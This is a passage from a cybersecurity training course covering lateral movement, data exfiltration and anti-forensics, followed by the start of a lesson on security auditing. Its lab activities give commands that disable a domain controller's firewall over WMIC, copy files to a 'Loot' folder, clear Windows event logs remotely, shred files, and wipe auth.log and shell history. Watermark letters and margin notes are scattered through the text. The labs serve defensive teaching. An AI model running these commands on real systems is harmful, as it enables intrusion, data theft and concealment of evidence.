adjusts Host B's routing tables to add an entry that routes 10.39.5.0/24 traffic through their exploit
at
session, they'll be able to enumerate the hosts on this subnet.

lic
up
D
ot
N
Figure 5-12: An attacker routing traffic on a different subnet through a pivot host.
o
D

ACTIVITY 5-3
Assessing Lateral Movement and Pivoting
Techniques
e
Before You Begin
ut
You'll be using all three of your machines in this activity.
Activity: Assessing
ib
Scenario Lateral Movement and
Pivoting Techniques
Through your team's security efforts, attackers are often cut off at certain critical endpoints.
However, your endpoints are still open to other "safe" hosts in the network. An attacker can take
tr
advantage of these hosts to pivot and move laterally to your more valuable targets. In this activity,
you'll assess how pivoting can overcome certain security measures. Your Kali Linux VM cannot
is
access your Windows Server machine directly anymore, but you'll take a different route to get to the
domain controller—using the Windows 10 client as a pivot.
D
1. Prepare your Windows Server domain controller to reject all contact from your
Kali Linux VM.
or
a) On your Windows Server machine, from Server Manager, select Tools→Windows Defender Firewall
with Advanced Security.
e
b) From the console tree, select Inbound Rules.
c) From the Actions pane on the right, select New Rule.
at
d) In the New Inbound Rule Wizard, select the Custom radio button, and then select Next.
e) Select Next to accept the Program defaults, and select Next to accept the Protocols and Ports
lic
defaults.
f) On the Scope page, in the Which local IP addresses does this rule apply to? section, select the
These IP addresses radio button and select Add.
g) In the IP Address dialog box, in the This IP address or subnet text box, enter your Windows Server's
up
IP address and select OK.

h) In the Which remote IP addresses does this rule apply to? section, add your Kali Linux VM's IP
address and then select Next.
D
i) On the Action page, select Block the connection and select Next.
j) On the Profile page, select Next to accept the defaults.
k) Name the rule No Kali Linux, and then select Finish.
ot
2. Test the rule.

a) From your Kali Linux VM, ping your Windows Server.
N
o
D
The ping should fail.

b) Press Ctrl+C to stop the ping attempt.

c) From your Windows 10 client machine, ping your Windows Server.
e
ut
ib
The ping should succeed.
3. Using Kali Linux, perform reconnaissance on the server.
tr
a) In a Kali Linux terminal, enter ssh Administrator@10.39.5.#, where # corresponds to your
is
Windows 10 client's IP address.
Note: Make sure you're connecting to your Windows 10 client's IP address,
D
and not the server. The client also has an OpenSSH server set up and is
accepting domain credentials.
b) Enter yes to continue.
If students mistype
something in the SSH
c) Enter the password.
or
d) At the prompt, enter echo %logonserver%
This command reveals the computer name of the domain controller that the Windows 10 domain
e
connection, they may member is connected to.
need to execute the e) Verify that your domain controller's computer name is listed.
at
mistyped command and

start over. Encourage
them to type carefully.
lic
f) At the prompt, enter ping <computer name>, using the name you just enumerated.
up
g) Verify that you can see your server's IP address.

D
ot
An attacker won't necessarily know the IP address of their target, so this helps them discover it.
N
4. Pivot from the client to the server.

a) In the Kali Linux terminal, enter the following command:
o
wmic /node:<IP address> /user:Administrator /password:Pa22w0rd process

D
If students are seeing an call create "cmd.exe /c netsh advfirewall set allprofiles state off"
RPC server is Ensure that you're replacing <IP address> with the Windows Server IP address you matched
unavailable error, ensure previously.
the Windows Firewall
Remote Management This command uses WMIC to completely disable the firewall on the Windows Server domain
rules are enabled on controller.
their Windows 10 client's
firewall, as per the
course setup.

b) Verify that WMIC returns "Method execution successful."
e
ut
c) Press Ctrl+C to exit the SSH session.
ib
d) At the terminal prompt, enter ping 10.39.5.# where # corresponds to your Windows Server's IP
address.
tr
e) Verify that the ping succeeds.
Your Windows Server domain controller is now vulnerable to direct compromise from your Kali Linux
VM, among other security issues that come with an inactive firewall.
is
f) Press Ctrl+C to stop the ping.
D
5. Revert the DC's firewall back to its active state.
a) Return to your Windows Server machine.
b) Right-click the Start button and select Windows PowerShell (Admin).
c)
d)
e)
or
At the prompt, enter netsh advfirewall set allprofiles state on
Enter netsh advfirewall firewall delete rule name="No Kali Linux"
Close PowerShell and any other open windows besides Server Manager.
e
at
lic
up
D
ot
N
o
D

TOPIC D
Assess Data Exfiltration Techniques
Access is not the be-all and end-all for many attackers. Rather, their ultimate goal is often to steal
sensitive data from the organization. In this topic, you'll assess how attackers can leak data out of
your organization even after you think the intrusion has been dealt with.
e
ut
Data Exfiltration
Data Exfiltration The malicious transfer of data from one system to another is called data exfiltration. In a post-
ib
Example CAPEC IDs: attack scenario, attackers are able to stay hidden on compromised systems even after the main
CAPEC-511 and incident has concluded. Whether by lateral movement, pivoting, or any other APT technique, the
CAPEC-537. attacker gains access to private data that could put the organization in jeopardy if it were captured by
tr
unauthorized users.
is
Although exfiltration can be largely mitigated through data loss prevention (DLP) solutions and
strong encryption of sensitive data, it may not always be feasible for an organization to ensure that
every potential point of data undergoes encryption. What's more, an attacker who gains access to
D
administrative or other privileged credentials may be able to decrypt that data without much further
effort. Another potential vulnerability concerns how the organization is encrypting their data—do
they encrypt data only when it's in storage? If so, what's to prevent the attacker from capturing the
or
unencrypted data as it's in transit from a workstation to a remote database? Attackers have several
stealthy approaches available to them to take advantage of these opportunities.
e
Covert Channels
at
Covert Channels Data exfiltration procedures that use covert channels are able to transmit data outside the network
without alerting any intrusion detection or data loss countermeasures. The specific channel the
lic
attacker takes will differ from situation to situation, but all covert channels share a common
element: they enable the stealthy transmission of data from node to node using means the
organization's security controls do not anticipate.
up
Examples of covert channels include the following:

• Transmitting data over a rarely used port that the firewall does not block.
• Concealing data in the headers of TCP/IP packets so as to evade signature analysis by IDSs.
D
• Breaking the data up into multiple packets to be sent at different times to evade signature
analysis.
• Transmitting data over a shared resource that is not typically used as a communication channel
ot
(e.g., file system metadata).

• Transmitting encrypted data that cannot be inspected as it leaves the network.
N
Advanced IDSs may be able to detect some of this behavior, but in many cases, it's difficult for
automated systems to accurately account for all possible covert channels that an attacker could use.
It's not necessarily feasible for the organization to store and manually analyze all its outbound traffic
o
data, either.
D
Storage vs. Timing Channels

Covert channels can also be thought of in terms of two different categories: storage and timing. A
covert storage channel includes one process writing to a storage location and another process
reading from that location. A covert timing channel includes one process altering system resources
so that changes in response time can signal information to the recipient process. Some usages of
covert channels combine aspects of both storage and timing.
Lesson 5: Analyzing Post-Attack Techniques | Topic D

Steganography
Similar to using a covert channel, one technique for hiding data for exfiltration is steganography. Steganography
Using steganography, an attacker might be able to evade intrusion detection and data loss
countermeasures if they hide information within images or video. Modern tools hide digital
information so well the human eye cannot tell the difference; likewise, computer programs not
equipped for steganographic analysis may also fail to spot the hidden information.
For example, data loss countermeasures may inspect all outgoing packets for any signatures that
match a database of known file signatures. If the attacker simply transmitted a sensitive document
e
by itself, the countermeasures would immediately identify that image and shut down the connection.
ut
However, if the attacker embeds the sensitive document in a benign image, the data loss system may
let the transmission continue unabated. The system won't see a difference, and neither would an
administrator if they decide to inspect packets manually.
ib
In this case, not only is the data exfiltrated, but the leakage goes undetected as well. If the attacker
finds success in steganography, they may be able to exfiltrate a great deal of data over a long period
of time. Even if the organization learns of the leak, they may not know where the leak is coming
tr
from and how to plug it.
is
D
or
e
Figure 5-13: A document embedded in an image. Using steganography, the image appears no
at
different.
lic
File Sharing Services

The proliferation of file sharing services such as Dropbox™ and OneDrive® makes it difficult for File Sharing Services
up
organizations to outright block sensitive files from leaving the network. Ideally, sensitive files would
stay within the organization's perimeter at all times, but users' desire for convenience and portability
often outweighs this decision. If an employee works from home and needs to share important
financial data with another offsite employee, they may turn to a file sharing service with the
D
assumption that it is access controlled and reasonably secure from intrusion. This may be true, but
the more the organization allows file sharing with external cloud services, the more channels they
ot
open up that an attacker can use to exfiltrate critical information.

Rather than spend time and effort looking for a covert channel, an attacker could open a connection
to any of the cloud providers the organization uses to share files. If the data loss systems detect a
N
sensitive file outbound for Dropbox, for example, they may allow it to pass. Those systems won't
necessarily be able to discern legitimate from illegitimate use of a single file. So an attacker doesn't
even need to have access to the employees' official Dropbox share—the attacker can open their own
o
share, drop the files in, and then the data is leaked.
D

ACTIVITY 5-4
Assessing Data Exfiltration
Data File
e
C:\CNX0013Data\Analyzing Post-Attack Techniques\DT_Watch.zip
ut
Activity: Assessing Data
Exfiltration Before You Begin
You'll be using both your Kali Linux VM and your Windows Server in this activity.
ib
Scenario
tr
Now that you've identified how an attacker can compromise your Windows Server, you'll want to
see how easily the attacker can pull information off that server. This server stores information about
is
a new technology that Develetech is working on: a smartwatch. You'll exfiltrate an archive
containing sensitive smartwatch files from the server onto your attack machine. In a real attack, the
attacker would then be able to make off with the data and leak it to the public, sell it to a
D
competitor, or engage in other behavior that could undermine Develetech's brand.
1.
or
Prepare your Windows Server with the sensitive data.
a) On your Windows Server, create a directory at C:\ called CurrentProjects.
b) Extract the DT_Watch.zip file to C:\CurrentProjects.
e
Gain remote access to the server and search for the sensitive data.
at
2.
a) On your Kali Linux VM, right-click the desktop and select Create Folder.
b) Name the folder Loot and select Create.
lic
c) Open a terminal and enter ssh Administrator@10.39.5.#, where # corresponds to your

server's IP address.
d) Enter the password you discovered earlier—Pa22w0rd
up
D
ot
N
o
D

e) At the prompt, enter dir to list the contents of the default directory.
e
ut
ib
tr
is
D
f) Enter cd C:\ to navigate to the root directory.
or
g) List the root directory's contents. Verify that there's a CurrentProjects folder.
e
h) Navigate to this CurrentProjects folder.
at
lic
up
D
ot
N
o
D

i) Navigate to the DT_Watch folder and list its contents.
e
ut
ib
tr
is
D
or
From an attacker's perspective, this has a lot of company confidential information that they could
e
make use of.
at
3. Review the SCP protocol.

a) Open a new terminal window in Kali Linux.
lic
b) Enter man scp and review the details of this command.

The secure copy (SCP) protocol is based on SSH and securely transfers files between remote hosts
on a network. The format for using SCP to download a file from a remote host is scp [options]
up
[remote host] [path] [local path]

Ensure that students are
putting a space between 4. Rather than copying each file individually, you'll transfer the entire directory at
D
the remote path

(Windows) and the local
once.
path (Linux).
What is the flag to download a directory recursively?
ot
A: -r
5. Transfer the DT_Watch.zip file to your attack machine.

N
a) Return to your SSH terminal.

b) Press Ctrl+C to close the SSH session.
o
c) Enter the following command: scp -r Administrator@10.39.5.#:c:/CurrentProjects/

DT_Watch /home/kali/Desktop/Loot
D

d) Enter the password.
e
ut
ib
tr
This transfers the entire DT_Watch directory to the Loot directory on your Kali Linux VM. The
download should take only a few moments.
is
e) Navigate to the Loot directory in Kali Linux and verify that all the files are there.
D
or
e
at
lic
up
D
ot
N
o
D
6. How could an administrator prevent this exfiltration?

A: Answers may vary, but they could disable SSH access on the server, block remote access ports
on the firewall, or implement an IDS/IPS or data loss prevention (DLP) software to monitor
sensitive file movement.

7. What other methods could an attacker use to remove data from the
organization?
A: Answers may vary, but could include: physically connecting removable media to the server;
exfiltrating over FTP/S; exfiltrating over HTTP/S, using Netcat as a backdoor to read and write
files over the network; and more.
8. Close all open windows in Kali Linux.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC E
Assess Anti-Forensics Techniques
In this topic, you'll assess how post-attack threats will attempt to disrupt the organization's forensic
investigations.
e
Anti-Forensics
ut
In the realm of cybersecurity, anti-forensics is the process by which an attacker disrupts or impedes Anti-Forensics
a forensic investigation. The attacker can do this by: Inform students that
ib
• Negatively affecting the quality, quantity, or integrity of evidence. forensics will be
discussed at the end of
• Making forensic analysis more difficult or impossible. the course.
tr
• Deceiving forensic investigators.
Since the purpose of forensics is to discover who did something and how, the attacker will likely
is
have one or more of the following reasons for disrupting that process:
• To escape notice while they are still inside the perimeter.
D
• To eliminate themselves as a suspect after they have concluded the attack.
• To frame another person or group as suspects.
• To waste the organization's time and resources.
or
The anti-forensics process relies on weaknesses inherent in computer systems, forensic tools, and
the human investigators themselves. There are several techniques available to the attacker that can
exploit these weaknesses.
e
at
Golden Ticket and Anti-Forensics

Log on and log off events in the Windows event log are usually recorded with the user name and
lic
Golden Ticket and Anti-

domain name of the account. However, for some time, many forged Kerberos tickets would include Forensics
a static or otherwise anomalous entry in the domain name field. This made it easy for investigators
to detect a golden ticket, as any log on events that showed an invalid domain would likely point to
up
an attack on Kerberos.
However, newer golden ticket generators have corrected this oversight and are now able to populate
the ticket with less-anomalous information in the domain field. For example, the ticket may instead
D
use the system's NetBIOS name, and any automated forensic systems that evaluate domain logons
may fail to catch this new behavior. This can make it difficult for the forensic investigator to piece
together a narrative of events that led to the domain controller being compromised.
ot
N
o
D
Figure 5-14: On the left, the logon event is recorded with an invalid domain name. On the right,
the logon event is recorded with the correct NetBIOS name.
Lesson 5: Analyzing Post-Attack Techniques | Topic E

Buffer Overflows
Buffer Overflows The attacker can target the forensic investigator more directly by initiating a buffer overflow of the
investigator's tools during analysis. If the attacker leaves behind files in the wake of an attack, they
can effectively set a trap for the investigator. When the investigator goes to view or run the evidence
they've gathered, one or more of those files can trigger a DoS condition by causing the investigative
software to hang or crash. In fact, the malicious file(s) could be crafted in such a way they always
trigger a buffer overflow, so the investigator has no hope of actually analyzing the evidence. Even if
the investigator decides to move on to analyzing a more benign file, they won't necessarily be able to
e
avoid triggering more buffer overflows in unpredictable files. This can be frustrating and lead to lost
time and productivity.
ut
The following are two examples of how an attacker can cause a forensic tool to overflow:
• The attacker creates an infinite loop in memory by crafting a document file that exploits
ib
vulnerable dynamic-link libraries (DLLs).
• The attacker can execute a heap spraying attack through bitmap files. Heap spraying is similar to
tr
a buffer overflow—the attacker injects malicious code into an application's memory heap in
specific places. The bitmap file, when opened in the forensic application, may force the
application to read memory from the sprayed heap, executing the malicious code.
is
Most popular forensic tools have kept up with these vulnerabilities and have issued security fixes to
mitigate buffer overflow attacks. However, attackers may still be able to exploit forensic toolkits the
D
investigator fails to keep up to date.
Memory Residents
Memory Residents
or
A piece of malware that resides in memory can be identified by the operating system as a memory
resident—that is, the OS is not allowed to swap this memory to permanent storage as it does
e
during normal execution. Most memory residents are critical OS files or often-used programs that
need to load quickly by taking advantage of RAM's speed, though these techniques are less common
at
in modern operating systems. Malicious software, particularly viruses, run as memory residents to
stay active even while the application it is normally attached to is no longer running. This makes
lic
them a particularly insidious form of malware.

In an anti-forensics application, memory resident malware may fool an investigator or their
automated tools into believing a computer has no trace of malware. If no overt malicious application
up
is running, and no files in storage match malicious signatures, then a malware identification program
may give the all clear. However, the infection may still remain in memory, ready to execute if certain
conditions are met (like the OS finishes loading). However, some modern forensic tools are able to
scan a computer's memory to detect anomalies.
D
Program Packers
ot
Program Packers A program packer is a method of compression in which an executable is mostly compressed. The
Example CVE ID: part that isn't compressed includes code to decompress the executable. This all combines into a
N
CVE-2015-1462. single executable that, when executed, begins to decompress the entire code before that code
Example CAPEC ID: actually runs. In this sense, a packed program is a type of self-extracting archive. There are two main
CAPEC-570. advantages to program packing: reducing file size, and increasing the difficulty of reverse
o
engineering the file's contents. Organizations or individuals who share proprietary software may use
program packing to deter theft of intellectual property and violations of copyright.
D
However, this is also something an attacker can use to their advantage. Packing malware makes it
more difficult to detect and analyze for many anti-malware solutions. They often compensate by
identifying all packed programs as malware, but this complicates the matter with false positives. For
a forensic analyst, it may be difficult to accurately mark an executable as a maliciously packed
program without some serious effort to reverse engineer it. This is because packed malware, until it's
unpacked, can mask string literals and effectively modify its signatures to avoid triggering signature-

based scanners. This can waste the analyst's time and resources. However, an analyst can work
around this by unpacking the executable in a controlled sandbox environment.
VM and Sandbox Detection

A particularly clever anti-forensics technique involves malware detecting when it is being run inside VM and Sandbox
a virtual machine (VM). VMs are used by malware analysts to create a sandbox environment. A Detection
sandbox environment is an ad hoc, isolated environment that enables forensic analysts to examine
malware without jeopardizing the actual live environment the VM is running on. Aside from manual
e
analysis, personnel also use these environments to run automated malware analysis tools.
ut
Malware is able to detect that it is running in a sandbox usually using one of the following methods:
• Detecting direct hooks into the application. Sandboxes hook into programs in order to monitor
ib
the calls they make to system libraries. A malicious application may be able to detect these hooks.
• Exploiting unpatched zero-day vulnerabilities in the sandbox's software.
If malware detects it is running in a sandbox, it can respond in a number of ways to hide its
tr
presence:
is
• It can stay dormant, only to wake on the system once it detects usage patterns likely produced by
a person and not a machine. For example, the computer is unlikely to use the mouse, so the
malware may be written to activate only upon mouse movement.
D
• It may also be able to run trivial computations for some time to fool the sandbox into thinking
it's benign, at which point it will execute the malicious part of the code.
malicious behavior between system calls.

or
• If it detects direct hooks, malware may also be able to obfuscate its presence by only exhibiting
Note that, because VMs are ubiquitous in production environments these days, sandbox detection is
not as useful to malware authors as it once was. Most competent malware authors assume their code
e
will run in virtualized environments that aren't explicitly set up to analyze malware.
at
Covering Tracks
lic
Once an attacker has completed their attack, they'll often attempt to disrupt the forensic process as Covering Tracks
they leave the target network and systems. Their aim is to make it as difficult as possible for forensic
investigators to identify how the attack commenced, and who is responsible. There are many ways in
up
which an attacker can cover their tracks, including:

• Clearing event logs with an exploit program. Tools like Metasploit include commands for
clearing an entire event log on a machine that the attacker is currently exploiting. Because it
D
clears every log rather than specific ones, this may raise suspicion; however, it can still make it
harder for a forensic analyst to do their job.
• Clearing discrete event log entries. Rather than wiping a log entirely and giving investigators
ot
something to be suspicious about, attackers may remove specific entries that could reveal their
attack. For example, an attacker with access to the Linux syslog can delete specific entries while
leaving the log itself intact.
N
• Changing event log entries. Rather than directly removing an entry or an entire log, it may be
more beneficial to the attacker to simply alter entries. For example, altering a user logon entry in
Windows security logs may enable the attacker to frame another individual.
o
• Erasing command-line history. Certain shells, like Bash shells on Linux, store the last n
D
commands in history. A forensic analyst can retrieve this history and piece together the attacker's
executed commands. However, the attacker can cover their tracks by setting the command
history to zero before executing their commands. For Bash and similar shells, this command is
export HISTSIZE=0
• Shredding files or erasing data securely. Since simply deleting a file using standard OS
features won't erase that file securely, attackers may resort to data wiping techniques to prevent
forensic investigators from recovering the incriminating information. On Linux systems, this is

known as shredding, because the shred command can overwrite files on storage to ensure
complete removal.
• Using any of the previously mentioned anti-forensics techniques. These techniques cannot
only hide an attacker while they still reside in the network, but the techniques also may be able to
help the attacker cover their tracks as they exit.
e
ut
ib
tr
is
Figure 5-15: Disabling shell history and shredding an exploit file.
D
ATT&CK
or
The MITRE Corporation's Adversarial Tactics, Techniques, and Common Knowledge
(ATT&CK™) model addresses the post-attack techniques discussed in this lesson, and more. This
freely available resource tags each specific type of attack with a unique ID, places each attack in one
or more post-attack categories (e.g., lateral movement), and then describes each attack on a technical
e
level.
at
ATT&CK is available at https://attack.mitre.org.

lic
up
D
ot
N
o
D

ACTIVITY 5-5
Assessing Anti-Forensics Techniques
Before You Begin
e
You'll be using all three of your machines in this activity.
ut
Activity: Assessing Anti-
Scenario Forensics Techniques
Now that you've explored the possibility of an attacker exfiltrating sensitive data from your systems,
ib
you need to consider that such an attack won't be so easy to detect. Attackers cover their tracks to
remove evidence that could implicate them in the attack, and they also seek to hide the attack's
tr
existence altogether. In this activity, you'll play the attacker attempting to wipe all traces of data
exfiltration. You'll remove event logs on the target server that could implicate the source and vector
of the attack. Also, consider that the attacker may not have direct physical access to the attack
is
machine—they may have compromised an organization's machine to use as a launching point for
exploitation. So, you'll also erase evidence on the Kali Linux VM that could indicate a malicious data
D
transfer took place.
It's important not to
delete the Security log in
1. Verify the traces of your exfiltration attack.
or
a) On your Windows Server, in Server Manager, select Tools→Event Viewer.
b) In the navigation pane, expand Windows Logs and select Application.
this activity, as students
will be reviewing it in a
later lesson.
e
c) In the list of entries, verify that there are several entries with the source sshd.
at
lic
up
D
These entries are created every time an SSH connection is initiated. The details pane even reveals
the source of the connection. You'll be clearing this log to hide evidence of your Kali Linux VM's IP
ot
address connecting to the server over SSH.

d) Close Event Viewer.
N
2. Clear the server's Application log remotely.

a) Switch to your Kali Linux VM and open a terminal.
o
b) At the terminal, enter smbmap -d DEVELETECH -u Administrator -p Pa22w0rd -H

10.39.5.# -x 'wevtutil cl Application'
D
Note: Remember to substitute 10.39.5.# for your server's IP address.
The Linux-based smbmap utility is primarily designed to enumerate network shares, but it can also
execute remote commands on a Windows host. The wevtutil command clears the event log
specified—in this case, the Application log.
The prompt should return if there were no errors in execution.

c) Switch to your Windows Server, open Event Viewer, and verify that the Application log is completely
blank.
d) Close Event Viewer.
3. Securely delete the data you exfiltrated to your Kali Linux VM.
a) On Kali Linux, enter the following command: find /home/kali/Desktop/Loot -type f -
exec shred -z -u {} \;
The shred command works only on files, so you need to pair it with find and the -exec option to
execute shred on all files in the specified directory. As for the shred command itself, the -u option
e
removes the files after they've been overwritten, and the -z flag does a final overwrite pass to hide
the fact that shredding took place.
ut
b) Enter rm -r /home/kali/Desktop/Loot
ib
tr
is
This command removes the directory.
D
c) Verify that the Loot directory and its contents are gone.
4. Clear the login and command execution history on your Kali Linux VM.
Consider having
investigator to analyze.
b) Enter echo "" > ~/.zsh_history
or
a) At the Kali Linux terminal, enter sudo bash -c "echo '' > /var/log/auth.log"
This clears the Authentication log so the attacker's login information isn't recorded for a forensic
e
students open the This clears a log file that records the user's history of entering commands into the Z shell, the default
at
Authentication log file to shell in Kali Linux.

verify that it has actually c) Enter kill -9 $$
been cleared. Because This kills the current shell session, so it won't return you to a prompt. The -9 option sends a kill
lic
clearing the signal that cannot be blocked, and the $$ refers to the process ID of the current shell.
Authentication log
d) Close the terminal.
requires superuser
privileges, it will not be e) From the Kali Linux desktop, select the Log Out icon on the top-right panel.
up
completely empty since

it records when the root
user is signed out after
the command finishes.
D
ot
f) From the Log out Kali screen, select Log Out.

g) Log back into Kali Linux, then open a terminal.
N
h) Enter history to verify that it's empty.
What other methods could an attacker use to cover their tracks?

o
5.
A: Answers may vary, but they could delete individual entries of an event log rather than the entire
D
log. This may arouse less suspicion, but will typically take more time and finesse to identify each
and every relevant entry. The attacker may also forge log entries rather than delete any of them to
misdirect a forensic analyst.

Summary
In this lesson, you analyzed the last phase of the attack process: the post-attack phase. You assessed
how attackers can remain in control of your network and systems even after the main attack has
been launched, and even after the incident response team thinks it has contained the situation. You
also assessed how attackers remain stealthy and evade detection so they can continue to exploit the
organization without its knowledge. Lastly, attackers will attempt to thwart the forensic process to
remain unidentified, and you assessed what tools and techniques they use to accomplish this. Being
e
able to detect and analyze post-attack processes is an often overlooked, yet crucial, skill for the
ut
cybersecurity practitioner to have.
Has your organization or an organization you're familiar with blocked or use the social
ib
otherwise restricted services that may be used in a C&C operation? If so, which networking tools
ones, and why? If not, do you think it's a good idea to restrict any of these provided on the CHOICE
services? Course screen to follow
tr
A: Answers will vary. Organizations may have blocked IRC in the network, as this is the most well-known
vector for C&C operations, and most organizations have no use for this chat protocol. Other
is
organizations may have blocked ICMP and P2P networks for reasons other than C&C, and may see and resources to support
the blocks as being an added benefit in light of C&C threats. Students whose organizations don't continued learning.
D
block any particular services to mitigate C&C may have done so deliberately; the organization could
use particular services like social media sites and cloud repositories extensively. They may not be
able to restrict these channels without disrupting operations.
about in your organization, and why? or

What types of lateral movement or pivoting techniques are you most concerned
A: Answers will vary. Some students may see the golden ticket attack as particularly devastating because
e
of how an attacker can move to domain controllers and essentially compromise the entire
at
organizational forest. Others may see pivoting as a major threat because of how quickly and, in some
cases, easily, an attacker can use a single compromised host to spread through the network.
Students whose internal hosts routinely use remote access services may be wary of how an attacker
lic
can use these services to move laterally from host to host. Even hosts without any overt remote
access services enabled can still be the victims of such an attack.
up
D
ot
N
o
D
Lesson 5: Analyzing Post-Attack Techniques |

e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

6 Assessing the
Organization's Security
e
ut
Posture
ib
tr
is
D
Lesson Introduction
or
Now that you've analyzed the threats to your organization and their attack process, you can
assess just how prepared your current security posture is to defend against these threats. The
assessment process includes multiple methods and tools that will assist you in identifying
e
weak points in the organization. More importantly, assessment will reveal how to correct
these weaknesses and mitigate risk in the organization.
at
Lesson Objectives
lic

up
• Implement cybersecurity auditing processes.

• Implement a vulnerability management plan.
• Assess vulnerabilities in the organization.
D
• Conduct authorized penetration tests to evaluate the organization's security posture.

ot
N
o
D

TOPIC A
Implement Cybersecurity Auditing
The first assessment technique you'll focus on is auditing. Through an auditing program, the
organization can ensure its cybersecurity efforts are in compliance with all relevant laws, regulations,
and policies.
e
ut
Cybersecurity Auditing
Cybersecurity Auditing Earlier, auditing was defined as an evaluation of the organization's adherence to established and
ib
relevant policies, regulations, and laws that govern cybersecurity. An audit might assess the
governance practices themselves, but more commonly, an audit is conducted to determine whether
or not the organization is in compliance with existing governance practices, and if so, to what
tr
degree. The objects under review include everything from the technical implementation of security
software to the execution of business plans that support security—anything that affects or is
is
affected by cybersecurity governance.
Audits can be performed by many different kinds of personnel. An auditor can be internal to the
D
organization, reviewing cybersecurity against organizational policy, or the auditor can be external,
reviewing cybersecurity against industry or legal obligations. Organizations can also enlist external
auditors to perform an assessment of organizational policy if no internal auditors are available.
or
However, regulatory audits are always performed by independent parties—typically under the
auspices of a government agency—in order to avoid a conflict of interest.
Cybersecurity auditing is a repeatable process of evaluating the organization's security posture.
e
Regulatory agencies mandate audits at a pace defined by the regulation, whereas the pace of internal
audits is up to the organization itself. Risk-averse organizations with adequate funding will likely
at
perform audits on a quarterly basis, whereas other organizations should perform audits at least
annually, but preferably semi-annually.
lic
Like most processes, auditing can be conceptualized as a series of steps:

1. Define audit objectives. What are your overall objectives in the audit, and how will you track
them?
up
2. Prepare for the audit. Identify your criteria for success and determine the optimal tools and
techniques to move forward with the audit.
3. Conduct the audit. Monitor, assess, and evaluate the elements that you identified as being
D
crucial to meeting the audit's objectives, and document your findings as you go.
4. Finalize the audit and share results. Communicate your findings to the appropriate audiences,
while also suggesting remediation actions to fill in any gaps you identified in the audit.
ot
N
o
D
Figure 6-1: The cybersecurity auditing process.
Lesson 6: Assessing the Organization's Security Posture | Topic A

Policies and Procedures Used in Auditing

An organizational audit can refer to many different policies and procedures that outline Policies and Procedures
cybersecurity requirements and guide their implementation. Essentially, any governing or operational Used in Auditing
document that has some relevance to cybersecurity can be useful to the auditor. Common examples
of policies useful to an audit include:
• Acceptable use policy (AUP) to ensure that users are using organizational resources as expected.
• Password policy to ensure users are choosing strong passwords, and that system administrators
are implementing the proper restrictions to enforce strong passwords.
e
• Remote access and VPN policy to ensure that employees who work from home or on the road
ut
are not putting the network at unnecessary risk of intrusion.
• Data security policy to ensure data is being stored, retained, and destroyed according to a clearly
defined lifecycle.
ib
• Personal data handling policy to ensure the organization is keeping PII private.
• Communication policy to ensure sensitive information flows from authorized user to authorized
tr
user and does not leak out to a wider audience.
Some examples of procedures useful to an audit include:
is
• Patching procedures to ensure software is being correctly updated to fixed versions without
disrupting critical services.
D
• Control testing procedures to ensure the effectiveness of security countermeasures is being
periodically reviewed.
• Intelligence collection procedures to ensure the most useful and actionable data is being collected
or
about potential threats, and that irrelevant data ("noise") is avoided.
• Incident response procedures to ensure first responders are working as a team to quickly and
successfully mitigate the effects of an incident.
e
• Evidence collection and handling procedures to ensure forensic investigators are not
contaminating or otherwise improperly handling evidence.
at
Objectives of an Audit
lic
One important component of developing an auditing policy is clearly outlining what you hope to Objectives of an Audit
accomplish in the audit. Each organization is going to have its own set of objectives that pertain to
up
its unique operational practices and ways of doing business. An auditor will need to consider many
different factors when determining these objectives, including:
• The organization's size, e.g., number of employees and overall market value.
• The organization's workforce, particularly how and where employees perform their daily duties.
D
• The organization's business goals, like marketing new products and services.
• The organization's past history of cybersecurity incidents, particularly if it has fallen prey to data
ot
breaches.
• The organization's legal obligations.
• And many more.
N
Even though each organization's audit objectives are tailored to that organization's needs, there are
some objectives common to most audits, including:
o
• Ensure all aspects of the business are in compliance with the relevant internal and external
requirements.
D
• Identify gaps where software and hardware resource are not meeting baseline expectations.
• Identify gaps where security technologies are not meeting baseline expectations.
• Identify gaps where business operations are not meeting baseline expectations.
• Determine whether or not security training and awareness campaigns are effective.
• Verify that backups of critical data are being taken and properly managed according to
requirements.

• Ensure that facilities and premises are adequately implementing protection against physical
intrusion.
• And many more.
Compliance Audit
Compliance Audit Although an auditor is unlikely to be called on to audit legal and regulatory compliance for their own
organization, some independent auditors are contracted by government agencies and/or industry
watchdogs to perform such audits. If you're in this role, you need to be aware of what is expected of
e
you from both the entity that commissioned the audit and the subject of that audit. Of course, this
ut
will depend on the compliance standards you're auditing the organization against, as well as the
organizational factors mentioned earlier.
Likewise, as a security practitioner in an organization subject to compliance audits, you need to be
ib
prepared to facilitate the audit as best you can. This means being proactive about compliance,
ensuring you have a plan in place to follow all applicable laws and regulations in your daily activities.
tr
Most of these As part of a compliance audit, you must be able to identify all sources of compliance that are
compliance sources relevant to the organization under audit. Examples of sources of compliance that are relevant to
is
were discussed in the cybersecurity include the following.
beginning of the course,
so they should look Type of Compliance Description and Example Sources
D
familiar to students.
Data privacy Privacy compliance sources focus on ensuring that
users' personal information cannot be accessed or
or modified by unauthorized parties. Examples include:

• HIPAA, which has requirements for how the
personal health data (PHI) of U.S. citizens must be
e
handled.
• GDPR, which has requirements for how the
at
personal data of EU citizens must be handled.

• PCI DSS, which has requirements for how
lic
cardholder data must be handled.

Organizational cybersecurity Cybersecurity compliance sources focus primarily on
ensuring organizations are implementing best practices
up
for security, particularly the protection of data and

networks against intrusion and compromise. Examples
include:
D
• PCI DSS, which has requirements for cybersecurity

practices in organizations that handle cardholder
data.
ot
• SOX, which has requirements for financial

recordkeeping and reporting for publicly traded U.S.
organizations that meet a certain market value
N
threshold.
Public sector Public sector compliance sources apply directly to
o
government agencies or contractors who work with

government agencies. Examples include:
D
• FISMA, which has requirements for cybersecurity

practices in U.S. federal agencies.
• CMMC, which certifies that DoD contractors meet
cybersecurity requirements set forth by an
accreditation board of cybersecurity professionals.

Type of Compliance Description and Example Sources

Environment, health, and safety EHS compliance applies to any organization, not just
(EHS) organizations in sectors typically associated with these
three aspects. Organizations must ensure the well-being
of their employees and take steps to minimize harm
done to the environment and the safety of the public at
large. Examples include:
• Occupational Safety and Health Act (OSHA), which
e
has requirements for ensuring the health and safety
of personnel in both public and private sectors of
ut
the U.S.
• Health and Safety at Work Act, which has
ib
requirements for ensuring the health and safety of
personnel in both public and private sectors of the
UK.
tr
Non-regulatory Some compliance auditing involves non-regulatory
is
standards and frameworks common to an industry.
Members of the industry who agree to adhere to these
standards and frameworks, as well as those seeking
D
certification, must still prove compliance. Examples in
the world of cybersecurity include:
or
